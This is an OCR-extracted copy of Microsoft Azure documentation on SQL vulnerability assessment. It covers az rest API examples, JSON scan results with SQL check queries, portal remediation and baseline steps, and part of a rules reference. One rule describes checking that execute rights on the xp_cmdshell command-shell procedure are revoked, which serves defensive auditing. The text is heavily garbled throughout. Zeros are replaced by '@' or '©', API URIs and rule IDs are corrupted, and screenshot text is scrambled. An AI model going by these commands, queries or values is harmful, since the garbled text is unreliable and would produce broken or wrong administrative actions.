255 IP addresses.", 

"queryCheck": { 

"columnNames": | 
"Firewall Rule Name", 
"Start Address", 

"End Address" 


D 
"expectedResult": [], 


"query": "SELECT name AS [Firewall Rule Name]\n ,»start_ip_address 
AS [Start Address]\n ,»end_ip_address AS [End Address]\nFROM 


sys.database firewall rules\nWHERE ( \n (CONVERT (bigint, 
parsename(end_ip_address, 1)) +\n CONVERT (bigint, 
parsename(end_ip address, 2)) * 256 + \n CONVERT (bigint, 
parsename(end_ip address, 3)) * 65536 + \n CONVERT (bigint, 
parsename(end_ip_address, 4)) * 16777216 ) \n - \n 
(CONVERT(bigint, parsename(start_ip address, 1)) +\n CONVERT (bigint, 
parsename(start_ip_ address, 2)) * 256 + \n CONVERT (bigint, 
parsename(start_ip address, 3)) * 65536 + \n CONVERT (bigint, 
parsename(start_ip address, 4)) * 16777216 )\n ) = 255° 

J 

"rationale": "Often, administrators add rules that grant excessive 


access as part of a troubleshooting process - to eliminate the firewall as 
the source of a problem, they simply create a rule that allows all traffic 
to pass to the affected database.\n\nGranting excessive access using 
database firewall rules is a clear security concern, as it violates the 
principle of least privilege by allowing unnecessary access to your 
database. In fact, it's the equivalent of placing the database outside of 
the firewall.", 

"ruleId": "VA2062", 

"ruleType": "NegativeList", 


"severity": "High", 
"title": "Database-level firewall rules should not grant excessive 
access" 
J 
"status": "NonFinding" 
b 
"type" 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResul 
tsa 


} 


Example 2: 
Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/scans/$ScanId/scanresults?api-version=2022-02-01-preview 


"value": [ 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/scans/VA1020/scanResults/VA1020", 

"name": "VA1@20", 

"properties": { 

“baselineAdjustedResult": null, 
"errorMessage": null, 


"isTrimmed": false, 

"queryResults": [], 

"remediation": { 
"automated": true, 
"description": "Remove the special user GUEST from all roles.", 
"portalLlink”; "= 
scripts: i] 

BO 

"ruleId": "VA1020", 

"ruleMetadata": { 
"penchmarkReferences": | 


{ 
"benchmark": "FedRAMP", 
"reference": null 
i 
L 
"category": "AuthenticationAndAuthorization", 
"description": “The guest user permits access to a database for 


any logins that are not mapped to a specific database user. This rule checks 
that no database roles are assigned to the Guest user.", 
"queryCheck": { 
"columnNames": [ 
"Role" 

l 

"expectedResult": [], 

"query": “SELECT roles.[name] AS [Role]\nFROM 
sys.database_role_members AS drms\nINNER JOIN sys.database_principals AS 
roles ON drms.role_principal_id = roles.principal_id\nINNER JOIN 
sys.database_principals AS users ON drms.member_principal_id = 


users.principal_id\nWHERE users.[name] = 'guest'" 
BO 
"rationale": "Database Roles are the basic building block at the 


heart of separation of duties and the principle of least permission. 
Granting the Guest user membership to specific roles defeats this purpose.", 
"ruleId": "VA102e", 
"ruleType": "NegativeList", 
"severity": "High", 
"title": "Database user GUEST should not be a member of any 


"status": "“NonFinding" 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResul 
tsa 


hs 


{ 
"id": "/subscriptions/00000000-1111-2222-3333- 


444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/Default/scans/VA1054/scanResults/VA1054", 
"name": "VA1@54", 
"properties": { 
"paselineAdjustedResult": null, 
"errorMessage": null, 


"isTrimmed": false, 
"queryResults": [], 
"remediation": { 
"automated": false, 
"description": “Revoke unnecessary permissions granted to 
PUBLIC", 
sportallink =: 5. 
*scripts™ || || 
hs 
"ruleId": "VA1054", 
"ruleMetadata": { 
"penchmarkReferences": | 


{ 
"benchmark": "FedRAMP", 
"reference": null 
} 
l» 
"category": "AuthenticationAndAuthorization", 
"description": "Every SQL Server login belongs to the public 


server role. When a server principal has not been granted or denied specific 
permissions on a securable object, the user inherits the permissions granted 
to public on that object. This rule displays a GetList of all securable 
objects or columns that are accessible to all users through the PUBLIC 
role.", 
"queryCheck": { 
"columnNames": [ 
"Permission", 


"Schema", 
"Object" 
LL 
"expectedResult": [], 
"query": “SELECT permission_name AS [Permission]\n 


»schema_name AS [Schema]\n ,object_name AS [Object]\nFROM (\n SELECT 
objs.TYPE COLLATE database_default AS object_type\n 

 Sschema_name(schema_id) COLLATE database_default AS schema_name\n 

,»objs.name COLLATE database_default AS object_name\n 
,»user_name(grantor_principal_id) COLLATE database default AS 
grantor_principal_name\n y»permission_name COLLATE database_default AS 
permission_name\n »perms.TYPE COLLATE database default AS TYPE\n 
»STATE COLLATE database default AS STATE\n FROM sys.database permissions AS 
perms\n INNER JOIN sys.objects AS objs\n ON objs.object_id = 
perms.major_id\n WHERE perms.class = 1 -- objects or columns. Other cases 
are handled by VA1095 which has different remediation syntax\n AND 
grantee_principal_id = DATABASE PRINCIPAL_ID('‘public')\n AND [state] IN (\n 
'G'\n ,'W'\n )\n AND NOT (\n -- These permissions are granted by 
default to public\n permission_name = 'EXECUTE'\n AND 
schema_name(schema_id) = ‘dbo'\n AND STATE = 'G'\n AND objs.name IN (\n 


"fn_sysdac_is_dac_creator'\n » fn_sysdac_is_currentuser_sa'\n 

»' fn_sysdac_is_login_creator'\n » fn_sysdac_get_username' \n 

» sp_sysdac_ensure_dac_creator'\n » sp_sysdac_add_instance'\n 

» sp_sysdac_add_history_entry'\n » sp_sysdac_delete_instance'\n 

» sp_sysdac_upgrade_instance'\n » sp_sysdac_drop_database'\n 

» sp_sysdac_rename_database'\n »' sp_sysdac_setreadonly_database'\n 


»' sp_sysdac_rollback_committed_step'\n 
» sp_sysdac_update_history_entry'\n » sp_sysdac_resolve_pending entry'\n 


»' sp_sysdac_rollback_pending object'\n 
,»'sp_sysdac_rollback_all_ pending objects'\n 


,» fn_sysdac_get_currentusername' \n )\n OR permission_name = 'SELECT'\n 
AND schema_name(schema_id) = ‘sys'\n AND STATE = 'G'\n AND objs.name IN 
(\n "firewall_rules'\n » database _firewall_rules'\n 
» ipv6_database_firewall_rules'\n » bandwidth_usage' \n 
» database_usage'\n » external_library_setup_errors'\n 
,» sql_feature_restrictions'\n ,» resource stats'\n 
,» @lastic_pool_resource_stats'\n ,» dm database copies'\n 
» geo_replication_links'\n ,» database _error_stats'\n » event_log'\n 
» database_connection_stats'\n )\n OR permission_name = ‘'SELECT'\n 
AND schema_name(schema_id) = ‘dbo'\n AND STATE = 'G'\n AND objs.name IN 
(\n "sysdac_instances_internal'\n » sysdac_history_internal'\n 
» sySdac_instances'\n )\n IOIA JOE 
J 
"rationale": "Database Roles are the basic building block at the 


heart of separation of duties and the principle of least permission. 
Granting permissions to principals through the default PUBLIC role defeats 
this purpose. ", 

"ruleId": "VA1054", 

"ruleType": "NegativeList", 

"severity": "Low", 

"title": "Excessive permissions should not be granted to PUBLIC 
role on objects or columns" 


J 


"status": "NonFinding" 


"Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/scanResul 
IEE: 


Get SQL vulnerability assessment scans on system 
database 


Example 1: 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/scans/$ScanId?api-version=2022-@2-@1-preview --uri-parameters 
systemDatabaseName=master 


{ 
"id": "/subscriptions/00000000-1111-2222-3333- 


444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 


t/scans/ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d", 
"name": "“ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d", 
"properties": { 
"database": "master", 
"endTime": "2023-04-24T@7:07:15.4704608Z", 
"highSeverityFailedRulesCount": ©, 
"isBaselineApplied": true, 
"lowSeverityFailedRulesCount": 9, 
"mediumSeverityFailedRulesCount": ©, 
"scanid": "“ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d", 
"server": "vulnerabilityaseessmenttest", 
“sqlVersion": "16.0.5100", 
“startTime": "2023-04-24T@7:07:15.4079623Z", 
"state": "Passed", 
"“totalFailedRulesCount": ©, 
“totalPassedRulesCount": 9, 
“totalRulesCount": 9, 
"triggerType": "OnDemand" 


"Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans" 


Example 2: 
Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/scans?api-version=2022-@2-@1-preview --uri-parameters 
systemDatabaseName=master 


"value": [ 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/scans/ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d", 

"name": "“ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d", 

"properties": { 

"database": "master", 

"endTime": "2023-04-24T07:07:15.4704608Z", 
"highSeverityFailedRulesCount": ©, 
"isBaselineApplied": true, 
"lowSeverityFailedRulesCount": ©, 
"mediumSeverityFailedRulesCount": ©, 
"scanid": "“ab58a4de-6bd6-4e54-bfa7-1d5e97ece68d", 
"server": "vulnerabilityaseessmenttest", 
“sqlVersion": "16.0.5100", 

"“startTime": "2023-04-24T@7:07:15.4079623Z", 
"state": "Passed", 

“totalFailedRulesCount": ©, 


"totalPassedRulesCount": 9, 
"totalRulesCount": 9, 
"triggerType": "OnDemand" 
J 
"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans" 
hs 
{ 

"id": "/subscriptions/00000000-1111 - 2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/scans/f3ec698b-104c -40@a7-b1eb-251ff83bcf4e", 

"name": "f3ec698b-104c-40a7-bleb-251ff83bcf4e", 

"properties": { 

"database": "master", 
"endTime": "2023-@4-24T@7:07:15.4079623Z", 
"highSeverityFailedRulesCount": ©, 
"isBaselineApplied": true, 
"lowSeverityFailedRulesCount": 1, 
"mediumSeverityFailedRulesCount": 1, 
"scanId": "f3ec698b-104c-40a7-bleb-251ff83bcf4e", 
"server": "vulnerabilityaseessmenttest", 
“sqlVersion": "16.0.5100", 
"startTime": "2023-04-24T07:02:05.6581079Z", 
"state": "Failed", 
"totalFailedRulesCount": 2, 
“totalPassedRulesCount": 7, 
"totalRulesCount": 9, 
"triggerType": "OnDemand" 
J 
"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans" 
hs 
{ 

"id": "/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t/scans/8c26afi1e-79d6-4238-b7cf-bc7941714F34", 

"name": "8c26afle-79d6-4238-b7cf-bc7941714F34", 

"properties": { 

"database": "master", 

"endTime": "2023-04-24T@7:02:05.6581079Z", 
"highSeverityFailedRulesCount": 1, 
"isBaselineApplied": false, 
"lowSeverityFailedRulesCount": 1, 
"mediumSeverityFailedRulesCount": ©, 
"scaniId": "8c26af1le-79d6-4238-b7cf-bc7941714f34", 
"server": "vulnerabilityaseessmenttest", 
“sqlVersion": "16.0.5100", 

“startTime": "2023-04-17T12:52:45.2387704Z", 
"state": "Failed", 

“totalFailedRulesCount": 2, 
"totalPassedRulesCount": 7, 
"totalRulesCount": 9, 

"triggerType": "OnDemand" 


"Microsoft.Sql/servers/sqlVulnerabilityAssessments/scans" 


Get SQL vulnerability assessment scans on user database 
Example 1: 
Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/scans/$ScanId?api-version=2022-@2-01-preview 


"id": "/subscriptions/@Q@000000-1111 - 2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessme 
nts/Default/scans/f64d81a1-9d7b-4516-a623-albfc845ed7e", 
"name": "f64d81a1-9d7b-4516-a623-albfc845ed7e", 
"properties": { 
"database": "db", 
"endTime": "2023-04-17T12:52:41.5235755Z", 
"highSeverityFailedRulesCount": 1, 
"isBaselineApplied": true, 
"lowSeverityFailedRulesCount": @, 
"mediumSeverityFailedRulesCount": ®©, 
"scanid": "f64d81a1-9d7b-4516-a623-albfc845ed7e", 
"server": "vulnerabilityaseessmenttest", 
"sqlVersion": "16.0.5100", 
"“startTime": "2023-04-17T12:52:41.41422092", 
"state": "Failed", 
“totalFailedRulesCount": 1, 
“totalPassedRulesCount": 23, 
“totalRulesCount": 24, 
"triggerType": "OnDemand" 

Jo 

"type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans” 


} 


Example 2: 
Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/scans?api-version=2022-@2-01-preview 


"id": "/subscriptions/@Q@000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/vulnerabilityAssessme 
nts/Default/scans/f64d81a1-9d7b-4516-a623-albfc845ed7e", 
"name": "f64d81a1-9d7b-4516-a623-albfc845ed7e", 
"properties": { 
"database": "db", 
"endTime": "2023-@4-17T12:52:41.5235755Z", 
"highSeverityFailedRulesCount": 1, 
"isBaselineApplied": true, 
"lowSeverityFailedRulesCount": @, 
"mediumSeverityFailedRulesCount": ©, 
"scaniId": "f64d81a1-9d7b-4516-a623-albfc845ed7e", 
"server": "“vulnerabilityaseessmenttest", 
"sqlVersion": "16.0.5100", 
“startTime": "2023-04-17T12:52:41.41422992", 
"state": "Failed", 
“totalFailedRulesCount": 1, 
“totalPassedRulesCount": 23, 
"totalRulesCount": 24, 
“triggerType": "OnDemand" 

J 


"type": "Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans" 


Invoke SQL vulnerability assessment scan on system 
database 


Azure CLI 


az rest --method Post --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t/initiateScan?api-version=2022-@2-@1-preview --uri-parameters 
systemDatabaseName=master 


"operation": "ExecuteDatabaseVulnerabilityAssessmentScan", 
"startTime": "2023-05-15T13:07:56.837Z" 


Invoke SQL vulnerability assessment scan on user 
database 


Azure CLI 


az rest --method Post --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsses 
sments/default/initiateScan?api-version=2022-@2-01-preview 


"operation": "ExecuteDatabaseVulnerabilityAssessmentScan", 
"“startTime": "2023-05-15T13:07:08.277Z" 


Get SQL vulnerability assessment server setting 


Azure CLI 


az rest --method Get --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
t?Papi-version=2022-02-01-preview 


"id": "/subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
die 

"name": "Default", 

"properties": { 

"state": "Enabled" 

Fo 


"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments" 


Set SQL vulnerability assessment server setting 
Example 1: 


Azure CLI 


az rest --method Put --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
tPapi-version=2022-02-@1-preview --body '{ \"properties\": { 

\"state\": \"Enabled\" }}' 


"id": "/subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
EO 


"name": "Default", 
"properties": { 

"state": "Enabled" 
KO 


"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments" 


Example 2: 


Azure CLI 


az rest --method Put --uri /subscriptions/00000000-1111 -2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
tPapi-version=2022-02-@1-preview --body '{ \"properties\": { 

\"state\": \"Disabled\" }}' 


"id": "/subscriptions/@Q000000-1111 - 2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/Defaul 
t", 

"name": "Default", 

"properties": { 

"state": "Disabled" 

J 


"type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments" 


Remove SQL vulnerability assessment server setting 


Azure CLI 
az rest --method Delete --uri /subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 


t.Sql/servers/vulnerabilityaseessmenttest/sqlVulnerabilityAssessments/defaul 
tPapi-version=2022-02-01-preview 


Next steps 


Find and remediate vulnerabilities in your Azure SQL databases 


Find and remediate vulnerabilities in 
your Azure SQL databases 


Article e 05/10/2023 


Microsoft Defender for Cloud provides vulnerability assessment for your Azure SQL 
databases. Vulnerability assessment scans your databases for software vulnerabilities 
and provides a list of findings. You can use the findings to remediate software 


vulnerabilities and disable findings. 


Prerequisites 


Make sure that you know whether you're using the express or classic configurations 


before you continue. 
To see which configuration you're using: 


1. In the Azure portal Z, open the specific resource in Azure SQL Database, SQL 
Managed Instance Database, or Azure Synapse. 

2. Under the Security heading, select Defender for Cloud. 

3. In the Enablement Status, select Configure to open the Microsoft Defender for 
SQL settings pane for either the entire server or managed instance. 


If the vulnerability settings show the option to configure a storage account, you're using 
the classic configuration. If not, you're using the express configuration. 


Find vulnerabilities in your Azure SQL 
databases 


Express configuration (preview) 


Permissions 


One of the following permissions is required to see vulnerability assessment results 
in the Microsoft Defender for Cloud recommendation SQL databases should have 


vulnerability findings resolved: 


e Security Admin 
e Security Reader 


The following permissions are required to changes vulnerability assessment 
settings: 


e SQL Security Manager 


If you're receiving any automated emails with links to scan results the following 
permissions are required to access the links about scan results or to view scan 


results at the resource-level: 


e SQL Security Manager 


Data residency 


SQL vulnerability assessment queries the SQL server using publicly available queries 
under Defender for Cloud recommendations for SQL vulnerability assessment, and 
stores the query results. SQL vulnerability assessment data is stored in the location 
of the logical server it's configured on. For example, if the user enabled vulnerability 
assessment on a logical server in West Europe, the results will be stored in West 
Europe. This data will be collected only if the SQL vulnerability assessment solution 
is configured on the logical server. 


On-demand vulnerability scans 
You can run SQL vulnerability assessment scans on-demand: 


1. From the resource's Defender for Cloud page, select View additional findings 
in Vulnerability Assessment to access the scan results from previous scans. 


Home > demosrv1 > DB1 (demosrv1/DB1) 


[a] DB1 (demosrv1/DB1) | Microsoft Defender for Cloud x 


SQL database 


| K @ For a comprehensive security plan that helps you protect against threats and manage security vulnerabilities across all resources in your subscription, upgrade your Azure 


e Defender plan = 
Integrations © Visit Microsoft Defender for Cloud to manage security across your virtual networks, data, apps, and more 
= Stream analytics (preview) 
@ Add Azure Search 
Recommendations Security alerts Findings Enablement Status: Enabled at the server- Learn more 
Security level (Configure) © About Microsoft Defender for Cloud 
About Microsoft Defender for SQL 
Es Auditing 1 o 0 A 1 E 
E Ledger Recommendations 
EZ Data Discovery & Classification 
Defender for Cloud continuously monitors the configuration of your SQL Servers to identify potential security vulnerabilities and recommends actions to mitigate them. 
E Dynamic Data Masking 
© Microsoft Defender for Cloud Description My Severity Te 
@ Transparent data encryption Transparent Data Encryption on SQL databases should be enabled @ Low 
Intelligent Performance Š= View additional recommendations in Defender for Cloud > 
&* Performance overview Staak 
Security incidents and alerts 
EE Performance recommendations 
E Query Performance Insight Defender for Cloud uses advanced analytics and global threat intelligence to alert you to malicious activity. Alerts displayed below are from the past 21 days. 
F Atomatic baring @ Check for alerts on this resource in Microsoft Defender for Cloud > 
Monitoring Vulnerability assessment findings 
B Alerts 
: ID TY Security Check TA, Applies to TY Severity Ny 
fii Metrics 


vA1219 Transparent data encryption should be enabled DBI A Medium 
E Diagnostic settings F F 


d Logs _ | $= View additional findings in Vulnerability Assessment > 


2. To run an on-demand scan to scan your database for vulnerabilities, select 
Scan from the toolbar: 


Microsoft Azure (Preview) E Search resources, services, and docs (G+/) ZA 
Home > SQL databases > contosocrmdb (contocrmsrv/contosocrmdb) | Microsoft Defender for Cloud 
contosocrmdb (contocrmsrv/contosocrmdb)  - x 
v Open Query esult D Scan History O Refresh D Feedback 
@ SQL Vulnerability Assessment rules have been updated. This may impact your scan results. Learn more —> 
Resource Total vulnerabilities Vulnerabilities by severity Last scan time 
JE contosocrmdb 3 High 2. 6/15/2023, 5:19:05 PM UTC 
Medium A Host resource 
Low 1 contocrmsrv/contosocrmdb 
Findings Passed Not applicable 
| Benchmarks: All v | 


| A Search to filter items... | 


ID Security check Category Benchmark Severity Additional Info 
VA2108 Minimal set of principals should be members of fixed... Authentication And Auth... FedRAMP @ High 
VA1258 Database owners are as expected Auditing And Logging FedRAMP @ High 
VA2130 Track all users with access to the database Authentication And Auth... SOX @ Low 


O Note 


The scan is lightweight and safe. It takes a few seconds to run and is entirely 
read-only. It doesn't make any changes to your database. 


Remediate vulnerabilities 


When a vulnerability scan completes, the report is displayed in the Azure portal. The 
report presents: 


e An overview of your security state 

e The number of issues that were found 

e Asummary by severity of the risks 

e A list of the findings for further investigations 


f] Vulnerability Assessment ~ x 


(sqlserver1/database1) @ Directory: Microsoft 


© Scan L Export Scan Results dD Scan History B Feedback 


Total failing checks Total passing checks Risk summary Last scan time egiak 

3 Q 3 1 © High Risk 1 Wed, 10 Feb 2021 03:08:57 SQL Vulnerability Assessment 
Medium 1 Be UTC 
Low Risk 1 BI 

Findings (3) Passed (31) 

Filter by ID or security check | | Category: All selected Vv | | Risk: All selected bai 

ID Ty SECURITY CHECK T4 APPLIESTO TL CATEGORY Ty RISK Ty ADDITIONALIN...Ty 

VA2108 Minimal set of principals should be members of fixed high i... D database1 Authentication & Au... @ High Should set an initial ... 

VA1143 ‘dbo’ user should not be used for normal service operation B database1 Surface area reduction A Medium 

VA2130 Track all users with access to the database B, master Authentication & Au... D Low Should set an initial ... 


To remediate the vulnerabilities discovered: 


1. Review your results and determine which of the report's findings are true 
security issues for your environment. 


2. Select each failed result to understand its impact and why the security check 
failed. 
@ Tip 
The findings details page includes actionable remediation information 


explaining how to resolve the issue. 


Vulnerability assessment findings 


ID Ty Security Check TA. Applies to Ty Severity ty 
VA2108 Minimal set of principals should be members of fixed h... contosocrmdb © High 
VA1258 Database owners are as expected contosocrmdb @ High 


VA2130 Track all users with access to the database contosocrmdb O Low 


Microsoft Azure (Preview) P Search resources, services, and docs (G+/) 


> contosocrmdb (contocrmsrv/contosocrmdb) 


VA2108 - Minimal set of principals should be members of fixed high impact database ro... i x 


Severity Status Scan time Remediation 
© High © Unhealthy 6/15/2023 
Remove members who should not have access to the database role 
Description 1 ALTER ROLE [db_owner] DROP MEMBER [CRM_USER] TI 
SQL Server provides roles to help manage the permissions. Roles are @ Exercise standard precautions when using the suggested remediation script on production 
security principals that group other principals. Database-level roles are environments 


database-wide in their permission scope. This rule checks that a minimal 
set of principals are members of the fixed database roles. 


Query and results © 
Impact 
SELECT user_name(sr.member_principal_id) AS [Principal] 

,user_name(sr.role_principal_id) AS [Role] 

»type_desc AS [Principal Type] 

,authentication_type_desc AS [Authentication Type] 


Fixed database roles may have administrative permissions on the system. e 
3 
4 
5 FROM sys.database_role_members AS sr 
6 
7 
8 


Following the principle of least privilege, it is important to minimize 
membership in fixed database roles and keep a baseline of these 
memberships. See https://docs.microsoft.com/en-us/sql/relational- 
databases/security/authentication-access/database-level-roles for 
additional information on database roles, INNER JOIN sys.database_principals AS sp ON sp.principal_id = 
WHERE sr.role_principal_id IN ( 


user_id(*bulkadmin’), 


Benchmark 
9 user_id(‘db_accessadmin’), 
e FedRAMP 18 user_id(‘db_securityadmin’), 
11 user_id(‘db_ddladmin'), 
12 user_id('db_backupoperator'’)) 


\ Was this information useful? Ç) ves O) No X Add all results as baseline Remove all from baseline 


3. As you review your assessment results, you can mark specific results as being 
an acceptable baseline in your environment. A baseline is essentially a 
customization of how the results are reported. In subsequent scans, results 
that match the baseline are considered as passes. After you've established 
your baseline security state, vulnerability assessment only reports on 
deviations from the baseline. In this way, you can focus your attention on the 
relevant issues. 


> contosocrmdb (contocrmsrv/contosocrmdb) > 


VA2108 - Minimal set of principals should be members of fixed high impact database ro... = x 
environments 
Severity Status Scan time 
@ High © Unhealthy 6/15/2023 
Query and results © 

Description 1 SELECT user_name(sr.member_principal_id) AS [Principal] D 

2 ,user_name(sr.role_principal_id) AS [Role] 
EO Server Provides roles to help manage the permissions. Roles are 3 ,type_desc AS [Principal Type] 
security principals that group other principals. Database-level roles are 4 ,authentication_type_desc AS [Authentication Type] 
database-wide in their permission scope. This rule checks that a minimal 

de B 5 FROM sys.database_role_members AS sr 

set of principals are members of the fixed database roles. AE B å 

6 INNER JOIN sys.database_principals AS sp ON sp.principal_id = 

7 WHERE sr.role_principal_id IN ( 
Impact 8 user_id('bulkadmin'), 
Fixed database roles may have administrative permissions on the system. = edad] better È )s 
Following the principle of least privilege, it is important to minimize e = ETZ ( X GA ekite min’), 
membership in fixed database roles and keep a baseline of these 11 edik db_ddladmin’), 
memberships. See https://docs.microsoft.com/en-us/sql/relational- 12 user_id(‘db_backupoperator')) 
databases/security/authentication-access/database-level-roles for 
Sa eRe aaae (ee Add all results as baseline Remove all from baseline 
Benchmark 

Status Principal Role Principal Type 
© FedRAMP 
© Not in Baseline (CRM_USER db_owner SQL_USER 


4. Any findings you've added to the baseline will now appear as Passed with an 
indication that they've passed because of the baseline changes. There's no 
need to run another scan for the baseline to take effect. 


Home 


database! (sqlserver1/database1) - x 


© sen V Open Query E S esults D Scan History oO Refresh @ Feedback 


Ci} SQL Vulnerability Assessment rules have been updated. This may impact your scan results. Learn more > 


Resource Total vulnerabilities Vulnerabilities by severity Last scan time 
E] databasel 0 High o 6/28/2023, 4:08:30 AM UTC 
Medium 0 Host resource 
Low 0 sqlserver1/database1 
Findings Not applicable 
Benchmarks: All v | 
p 
ID Security check Category Benchmark Status Additional Info 


VA2130 Track all users with access to the database Authentication And Aut... SOX © Healthy Pass Per Baseline 


Your vulnerability assessment scans can now be used to ensure that your database 
maintains a high level of security, and that your organizational policies are met. 


Next steps 


e Learn more about Microsoft Defender for Azure SQL. 

e Learn more about data discovery and classification. 

e Learn more about storing vulnerability assessment scan results in a storage 
account accessible behind firewalls and VNets. 


SQL vulnerability assessment rules 
reference guide 


Article e 12/29/2022 


This article lists the set of built-in rules that are used to flag security vulnerabilities and 
highlight deviations from best practices, such as misconfigurations and excessive 
permissions. The rules are based on Microsoft's best practices and focus on the security 
issues that present the biggest risks to your database and its valuable data. They cover 
both database-level issues as well as server-level security issues, like server firewall 
settings and server-level permissions. These rules also represent many of the 
requirements from various regulatory bodies to meet their compliance standards. 


Applies to: @ Azure SQL Database @ Azure SQL Managed Instance © azure Synapse 
Analytics © sal Server (all supported versions) 


The rules shown in your database scans depend on the SQL version and platform that 


was scanned. 


To learn about how to implement vulnerability assessment in Azure, see Implement 


vulnerability assessment. 


For a list of changes to these rules, see SQL vulnerability assessment rules changelog. 


Rule categories 


SQL vulnerability assessment rules have five categories, which are in the following 
sections: 


e Authentication and Authorization 
e Auditing and Logging 

e Data Protection 

e Installation Updates and Patches 
e Surface Area Reduction 


1 SQL Server 2012+ refers to all versions of SQL Server 2012 and above. 
2 SQL Server 2017+ refers to all versions of SQL Server 2017 and above. 


3 SQL Server 2016+ refers to all versions of SQL Server 2016 and above. 


Authentication and Authorization 


Rule ID 


VA1017 


VA1020 


VA1042 


VA1043 


VA1046 


Rule Title Rule 


Severity 


Execute permissions on High 
xp_cmdshell from all 
users (except dbo) 


should be revoked 


Database user GUEST 
should not be a 


High 


member of any role 


Database ownership High 
chaining should be 

disabled for all 

databases except for 

master, msdb, and 


tempdb 


Principal GUEST should 
not have access to any 
user database 


CHECK_POLICY should Low 
be enabled for all SQL 
logins 


Medium 


Rule Description 


The xp_cmdshell extended stored 
procedure spawns a Windows 
command shell, passing in a string for 
execution. This rule checks that no 
users (other than users with the 
CONTROL SERVER permission like 
members of the sysadmin server role) 
have permission to execute the 
xp_cmdshell extended stored 
procedure. 


The guest user permits access to a 
database for any logins that are not 
